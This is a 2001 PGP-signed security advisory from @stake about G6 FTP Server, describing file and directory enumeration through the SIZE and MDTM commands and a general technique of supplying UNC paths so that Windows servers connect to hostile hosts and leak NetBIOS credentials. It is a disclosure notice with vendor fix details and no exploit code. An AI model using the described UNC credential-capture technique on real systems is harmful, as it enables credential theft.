-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                                stake, Inc.
                              www.atstake.com

                       Security Advisory Notification

Advisory Name: G6 FTP File Existence Disclosure and Netbios Hash Retrieval
  Release Date: 04/03/2001
   Application: G6 FTP Server v2.0 exploit and example, other applications
                vulnerable to Netbios hash retrieval attack.
                [Note: Application has been renamed to BPFTP Server v2.10]
      Platform: Microsoft Windows 9x, NT, 2000, ME
      Severity: Enumeration of files and directories of the system,
                Windows Netbios credentials sent over the Internet to
                arbitrary hosts.
        Author: Rob Beck [rbeckatstake.com]
Vendor Status: Vendor has fixed version available for download
           CVE: CAN-2001-0263, CAN-2001-0264
     Reference: www.atstake.com/research/advisories/2001/a040301-1.txt

Executive Summary:

I. Gene6's G6 FTP Server fails to properly restrict access to files
outside of the ftp root directory, when using the 'size' and 'mdtm' ftp
commands, if the 'show relative paths' option is not set. These commands
can be used to gather useful information about the directory structure of
the host system.

II. Many software vendors are enabling features within their products to
take advantage of networked computers and shared resources either on a
local area network (LAN) or across the Internet. Almost all win32
applications now support the use of universal naming convention
(UNC) paths to access resources and files between machines running
Windows. Many of these application vendors fail to take into account the
security threat that arises should their features be misused or their
safeguards circumvented.

Overview:

         An attacker, through the use of 'trivial' exploits, may be able to
elevate the threat level of an attack by using features in Windows
applications or service software that allow an UNC path to be
supplied. By incorporating remote share paths into their attack methods,
attackers may have the ability to force a server into creating an
out-bound connection to hostile servers. When an attempt is made to
access the remote resources, the hostile servers would be able to capture
the victim computer's credentials. These credentials could then be used
for a more critical attack on the host system.

Vendor Response:

The vendor was very responsive and has made a fixed version of the
software available within a week of being notified of the issues.

A new fixed version of the software is available, BPFTP Server v2.10
(note the software name change). It can be downloaded from:

http://www.bpftpserver.com/download.html

Advisory Reference:

http://www.atstake.com/research/advisories/2001/a040301-1.txt

** The advisory contains additional information. We encourage those
** effected by this issue to read the advisory.
**
** All vulnerablity database maintainers should reference the above
** advisory reference URL to refer to this advisory.

Advisory policy: http://www.atstake.com/research/policy/
For more advisories: http://www.atstake.com/research/index.html
PGP Key: http://www.atstake.com/research/pgp_key.asc

Copyright 2001 stake, Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0

iQA/AwUBOso3j1ESXwDtLdMhEQJpEQCfe+A7+6/21ENQaPKbreUQYccrQ7YAn23b
pE4oQFrFeEd8/0L3+RAxrp2c
=Ngkz
-----END PGP SIGNATURE-----

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]